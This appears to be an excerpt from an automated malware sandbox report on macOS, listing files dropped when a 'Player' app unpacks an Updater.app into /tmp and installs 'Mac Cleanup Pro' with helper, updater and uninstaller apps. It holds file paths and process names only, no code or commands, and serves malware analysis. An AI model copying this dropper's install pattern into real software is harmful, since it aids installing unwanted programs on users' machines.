Source: /usr/bin/unzip (PID: 776)File written: /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftCoreGraphics.dylibJump to dropped file
Source: /usr/bin/unzip (PID: 776)File written: /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftMetal.dylibJump to dropped file
Source: /usr/bin/unzip (PID: 776)File written: /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftCoreData.dylibJump to dropped file
Source: /usr/bin/unzip (PID: 776)File written: /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftDispatch.dylibJump to dropped file
Source: /usr/bin/unzip (PID: 776)File written: /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftos.dylibJump to dropped file
Source: /usr/bin/unzip (PID: 776)File written: /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftCoreFoundation.dylibJump to dropped file
Source: /usr/bin/unzip (PID: 776)File written: /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftDarwin.dylibJump to dropped file
Source: /usr/bin/unzip (PID: 776)File written: /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftQuartzCore.dylibJump to dropped file
Source: /usr/bin/unzip (PID: 776)File written: /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftIOKit.dylibJump to dropped file
Source: /usr/bin/unzip (PID: 776)File written: /private/tmp/ddd/Updater.app/Contents/Frameworks/Alamofire.framework/Versions/A/AlamofireJump to dropped file
Source: /usr/bin/unzip (PID: 776)File written: /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftFoundation.dylibJump to dropped file
Source: /bin/cp (PID: 806)File written: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/MacOS/AutoupdateJump to dropped file
Source: /bin/cp (PID: 806)File written: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/MacOS/fileopJump to dropped file
Source: /bin/cp (PID: 806)File written: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/SparkleJump to dropped file
Source: /bin/cp (PID: 806)File written: /Applications/Mac Cleanup Pro.app/Contents/MacOS/Mac Cleanup ProJump to dropped file
Source: /bin/cp (PID: 806)File written: /Applications/Mac Cleanup Pro.app/Contents/Resources/helpermcp.app/Contents/MacOS/helpermcpJump to dropped file
Source: /bin/cp (PID: 806)File written: /Applications/Mac Cleanup Pro.app/Contents/Resources/helpermcp.app/Contents/Resources/mcpupdater.app/Contents/MacOS/mcpupdaterJump to dropped file
Source: /bin/cp (PID: 806)File written: /Applications/Mac Cleanup Pro.app/Contents/Resources/mcpuninstall.app/Contents/MacOS/mcpuninstallJump to dropped file
Source: /bin/cp (PID: 806)File written: /Applications/Mac Cleanup Pro.app/Contents/Resources/mcpuninstall.app/Contents/Resources/mcpuninstallhelper.app/Contents/MacOS/mcpuninstallhelperJump to dropped file
Source: /Applications/Mac Cleanup Pro.app/Contents/MacOS/Mac Cleanup Pro (PID: 809)File written: /Users/henry/Library/Application Support/mcp/helpermcp.app/Contents/MacOS/helpermcpJump to dropped file
Source: /Applications/Mac Cleanup Pro.app/Contents/MacOS/Mac Cleanup Pro (PID: 809)File written: /Users/henry/Library/Application Support/mcp/helpermcp.app/Contents/Resources/mcpupdater.app/Contents/MacOS/mcpupdaterJump to dropped file
Source: /Applications/Mac Cleanup Pro.app/Contents/MacOS/Mac Cleanup Pro (PID: 809)File written: /Users/henry/Library/Application Support/mcp/mcpuninstall.app/Contents/MacOS/mcpuninstallJump to dropped file
Source: /Applications/Mac Cleanup Pro.app/Contents/MacOS/Mac Cleanup Pro (PID: 809)File written: /Users/henry/Library/Application Support/mcp/mcpuninstall.app/Contents/Resources/mcpuninstallhelper.app/Contents/MacOS/mcpuninstallhelperJump to dropped file
Writes JavaScript files to diskShow sources
Source: /bin/cp (PID: 806)JavaScript file created: /Applications/Mac Cleanup Pro.app/Contents/Resources/DisableSelection.jsJump to dropped file
Source: /bin/cp (PID: 806)JavaScript file created: /Applications/Mac Cleanup Pro.app/Contents/Resources/helpermcp.app/Contents/Resources/DisableSelection.jsJump to dropped file
Source: /bin/cp (PID: 806)JavaScript file created: /Applications/Mac Cleanup Pro.app/Contents/Resources/helpermcp.app/Contents/Resources/jquery.min.jsJump to dropped file
Source: /bin/cp (PID: 806)JavaScript file created: /Applications/Mac Cleanup Pro.app/Contents/Resources/helpermcp.app/Contents/Resources/owl.carousel.min.jsJump to dropped file
Source: /bin/cp (PID: 806)JavaScript file created: /Applications/Mac Cleanup Pro.app/Contents/Resources/jquery.min.jsJump to dropped file
Source: /Applications/Mac Cleanup Pro.app/Contents/MacOS/Mac Cleanup Pro (PID: 809)JavaScript file created: /Users/henry/Library/Application Support/mcp/helpermcp.app/Contents/Resources/DisableSelection.jsJump to dropped file
Source: /Applications/Mac Cleanup Pro.app/Contents/MacOS/Mac Cleanup Pro (PID: 809)JavaScript file created: /Users/henry/Library/Application Support/mcp/helpermcp.app/Contents/Resources/jquery.min.jsJump to dropped file
Source: /Applications/Mac Cleanup Pro.app/Contents/MacOS/Mac Cleanup Pro (PID: 809)JavaScript file created: /Users/henry/Library/Application Support/mcp/helpermcp.app/Contents/Resources/owl.carousel.min.jsJump to dropped file
Writes Mach-O files to the tmp directoryShow sources
Source: /usr/bin/unzip (PID: 776)64-bit Mach-O written to tmp path: /private/tmp/ddd/Updater.app/Contents/MacOS/UpdaterJump to dropped file
Source: /usr/bin/unzip (PID: 776)64-bit Mach-O written to tmp path: /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftAppKit.dylibJump to dropped file
Source: /usr/bin/unzip (PID: 776)64-bit Mach-O written to tmp path: /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftCoreImage.dylibJump to dropped file
Source: /usr/bin/unzip (PID: 776)64-bit Mach-O written to tmp path: /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftObjectiveC.dylibJump to dropped file
Source: /usr/bin/unzip (PID: 776)64-bit Mach-O written to tmp path: /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftXPC.dylibJump to dropped file
Source: /usr/bin/unzip (PID: 776)64-bit Mach-O written to tmp path: /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftSafariServices.dylibJump to dropped file
Source: /usr/bin/unzip (PID: 776)64-bit Mach-O written to tmp path: /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftCore.dylibJump to dropped file
Source: /usr/bin/unzip (PID: 776)64-bit Mach-O written to tmp path: /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftCoreGraphics.dylibJump to dropped file
Source: /usr/bin/unzip (PID: 776)64-bit Mach-O written to tmp path: /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftMetal.dylibJump to dropped file
Source: /usr/bin/unzip (PID: 776)64-bit Mach-O written to tmp path: /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftCoreData.dylibJump to dropped file
Source: /usr/bin/unzip (PID: 776)64-bit Mach-O written to tmp path: /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftDispatch.dylibJump to dropped file
Source: /usr/bin/unzip (PID: 776)64-bit Mach-O written to tmp path: /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftos.dylibJump to dropped file
Source: /usr/bin/unzip (PID: 776)64-bit Mach-O written to tmp path: /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftCoreFoundation.dylibJump to dropped file
Source: /usr/bin/unzip (PID: 776)64-bit Mach-O written to tmp path: /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftDarwin.dylibJump to dropped file
Source: /usr/bin/unzip (PID: 776)64-bit Mach-O written to tmp path: /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftQuartzCore.dylibJump to dropped file
Source: /usr/bin/unzip (PID: 776)64-bit Mach-O written to tmp path: /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftIOKit.dylibJump to dropped file
Source: /usr/bin/unzip (PID: 776)64-bit Mach-O written to tmp path: /private/tmp/ddd/Updater.app/Contents/Frameworks/Alamofire.framework/Versions/A/AlamofireJump to dropped file
Source: /usr/bin/unzip (PID: 776)64-bit Mach-O written to tmp path: /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftFoundation.dylibJump to dropped file
Writes RTF files to diskShow sources
Source: /bin/cp (PID: 806)File written: /Applications/Mac Cleanup Pro.app/Contents/Resources/credits.rtfJump to dropped file
Writes ZIP files to diskShow sources
Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)ZIP file created: /private/tmp/Updater.zipJump to dropped file
Writes icon files to diskShow sources
Source: /bin/cp (PID: 806)File written: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/AppIcon.icnsJump to dropped file
Source: /bin/cp (PID: 806)File written: /Applications/Mac Cleanup Pro.app/Contents/Resources/application.icnsJump to dropped file
Creates application bundles containing framework (and dylib) filesShow sources
Source: /usr/bin/unzip (PID: 776)Framework directory file created: /tmp/ddd/Updater.app/Contents/Frameworks/libswiftAppKit.dylibJump to behavior
Source: /usr/bin/unzip (PID: 776)Framework directory file created: /tmp/ddd/Updater.app/Contents/Frameworks/libswiftCoreImage.dylibJump to behavior
Source: /usr/bin/unzip (PID: 776)Framework directory file created: /tmp/ddd/Updater.app/Contents/Frameworks/libswiftObjectiveC.dylibJump to behavior
Source: /usr/bin/unzip (PID: 776)Framework directory file created: /tmp/ddd/Updater.app/Contents/Frameworks/libswiftXPC.dylibJump to behavior
Source: /usr/bin/unzip (PID: 776)Framework directory file created: /tmp/ddd/Updater.app/Contents/Frameworks/libswiftSafariServices.dylibJump to behavior
Source: /usr/bin/unzip (PID: 776)Framework directory file created: /tmp/ddd/Updater.app/Contents/Frameworks/libswiftCore.dylibJump to behavior
Source: /usr/bin/unzip (PID: 776)Framework directory file created: /tmp/ddd/Updater.app/Contents/Frameworks/libswiftCoreGraphics.dylibJump to behavior
Source: /usr/bin/unzip (PID: 776)Framework directory file created: /tmp/ddd/Updater.app/Contents/Frameworks/libswiftMetal.dylibJump to behavior
Source: /usr/bin/unzip (PID: 776)Framework directory file created: /tmp/ddd/Updater.app/Contents/Frameworks/libswiftCoreData.dylibJump to behavior
Source: /usr/bin/unzip (PID: 776)Framework directory file created: /tmp/ddd/Updater.app/Contents/Frameworks/libswiftDispatch.dylibJump to behavior
Source: /usr/bin/unzip (PID: 776)Framework directory file created: /tmp/ddd/Updater.app/Contents/Frameworks/libswiftos.dylibJump to behavior
Source: /usr/bin/unzip (PID: 776)Framework directory file created: /tmp/ddd/Updater.app/Contents/Frameworks/libswiftCoreFoundation.dylibJump to behavior
Source: /usr/bin/unzip (PID: 776)Framework directory file created: /tmp/ddd/Updater.app/Contents/Frameworks/libswiftDarwin.dylibJump to behavior
Source: /usr/bin/unzip (PID: 776)Framework directory file created: /tmp/ddd/Updater.app/Contents/Frameworks/libswiftQuartzCore.dylibJump to behavior
Source: /usr/bin/unzip (PID: 776)Framework directory file created: /tmp/ddd/Updater.app/Contents/Frameworks/libswiftIOKit.dylibJump to behavior
Source: /usr/bin/unzip (PID: 776)Framework directory file created: /tmp/ddd/Updater.app/Contents/Frameworks/Alamofire.framework/AlamofireJump to behavior
Source: /usr/bin/unzip (PID: 776)Framework directory file created: /tmp/ddd/Updater.app/Contents/Frameworks/Alamofire.framework/ResourcesJump to behavior
Source: /usr/bin/unzip (PID: 776)Framework directory file created: /tmp/ddd/Updater.app/Contents/Frameworks/Alamofire.framework/Versions/A/_CodeSignature/CodeResourcesJump to behavior
Source: /usr/bin/unzip (PID: 776)Framework directory file created: /tmp/ddd/Updater.app/Contents/Frameworks/Alamofire.framework/Versions/A/AlamofireJump to behavior
Source: /usr/bin/unzip (PID: 776)Framework directory file created: /tmp/ddd/Updater.app/Contents/Frameworks/Alamofire.framework/Versions/A/Resources/Info.plistJump to behavior
Source: /usr/bin/unzip (PID: 776)Framework directory file created: /tmp/ddd/Updater.app/Contents/Frameworks/Alamofire.framework/Versions/CurrentJump to behavior
Source: /usr/bin/unzip (PID: 776)Framework directory file created: /tmp/ddd/Updater.app/Contents/Frameworks/libswiftFoundation.dylibJump to behavior
Source: /usr/bin/unzip (PID: 776)Framework directory symbolic link created: /tmp/ddd/Updater.app/Contents/Frameworks/Alamofire.framework/Alamofire -> Versions/Current/AlamofireJump to behavior
Source: /usr/bin/unzip (PID: 776)Framework directory symbolic link created: /tmp/ddd/Updater.app/Contents/Frameworks/Alamofire.framework/Resources -> Versions/Current/ResourcesJump to behavior
Source: /usr/bin/unzip (PID: 776)Framework directory symbolic link created: /tmp/ddd/Updater.app/Contents/Frameworks/Alamofire.framework/Versions/Current -> AJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/_CodeSignature/CodeResourcesJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/ar.lproj/Sparkle.stringsJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/ar.lproj/SUAutomaticUpdateAlert.nibJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/ar.lproj/SUUpdateAlert.nibJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/ar.lproj/SUUpdatePermissionPrompt.nibJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/_CodeSignature/CodeResourcesJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Info.plistJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/MacOS/AutoupdateJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/MacOS/fileopJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/PkgInfoJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/AppIcon.icnsJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/ar.lproj/Sparkle.stringsJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/ca.lproj/Sparkle.stringsJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/cs.lproj/Sparkle.stringsJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/da.lproj/Sparkle.stringsJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/de.lproj/Sparkle.stringsJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/el.lproj/Sparkle.stringsJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/en.lproj/Sparkle.stringsJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/es.lproj/Sparkle.stringsJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/fi.lproj/Sparkle.stringsJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/fr.lproj/Sparkle.stringsJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/he.lproj/Sparkle.stringsJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/is.lproj/Sparkle.stringsJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/it.lproj/Sparkle.stringsJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/ja.lproj/Sparkle.stringsJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/ko.lproj/Sparkle.stringsJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/nb.lproj/Sparkle.stringsJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/nl.lproj/Sparkle.stringsJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/pl.lproj/Sparkle.stringsJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/pt_BR.lproj/Sparkle.stringsJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/pt_PT.lproj/Sparkle.stringsJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/ro.lproj/Sparkle.stringsJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/ru.lproj/Sparkle.stringsJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/sk.lproj/Sparkle.stringsJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/sl.lproj/Sparkle.stringsJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/SUStatus.nibJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/sv.lproj/Sparkle.stringsJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/th.lproj/Sparkle.stringsJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/tr.lproj/Sparkle.stringsJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/uk.lproj/Sparkle.stringsJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/zh_CN.lproj/Sparkle.stringsJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/zh_TW.lproj/Sparkle.stringsJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/ca.lproj/Sparkle.stringsJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/cs.lproj/Sparkle.stringsJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/cs.lproj/SUAutomaticUpdateAlert.nibJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/cs.lproj/SUUpdateAlert.nibJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/cs.lproj/SUUpdatePermissionPrompt.nibJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/da.lproj/Sparkle.stringsJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/da.lproj/SUAutomaticUpdateAlert.nibJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/da.lproj/SUUpdateAlert.nibJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/da.lproj/SUUpdatePermissionPrompt.nibJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/de.lproj/Sparkle.stringsJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/de.lproj/SUAutomaticUpdateAlert.nibJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/de.lproj/SUUpdateAlert.nibJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/de.lproj/SUUpdatePermissionPrompt.nibJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/el.lproj/Sparkle.stringsJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/el.lproj/SUAutomaticUpdateAlert.nibJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/el.lproj/SUUpdateAlert.nibJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/el.lproj/SUUpdatePermissionPrompt.nibJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/en.lproj/Sparkle.stringsJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/en.lproj/SUAutomaticUpdateAlert.nibJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/en.lproj/SUUpdateAlert.nibJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/en.lproj/SUUpdatePermissionPrompt.nibJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/es.lproj/Sparkle.stringsJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/es.lproj/SUAutomaticUpdateAlert.nibJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/es.lproj/SUUpdateAlert.nibJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/es.lproj/SUUpdatePermissionPrompt.nibJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/fi.lproj/Sparkle.stringsJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/fr.lproj/Sparkle.stringsJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/fr.lproj/SUAutomaticUpdateAlert.nibJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/fr.lproj/SUUpdateAlert.nibJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/fr.lproj/SUUpdatePermissionPrompt.nibJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/he.lproj/Sparkle.stringsJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Info.plistJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/is.lproj/Sparkle.stringsJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/is.lproj/SUAutomaticUpdateAlert.nibJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/is.lproj/SUUpdateAlert.nibJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/is.lproj/SUUpdatePermissionPrompt.nibJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/it.lproj/Sparkle.stringsJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/it.lproj/SUAutomaticUpdateAlert.nibJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/it.lproj/SUUpdateAlert.nibJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/it.lproj/SUUpdatePermissionPrompt.nibJump to behavior
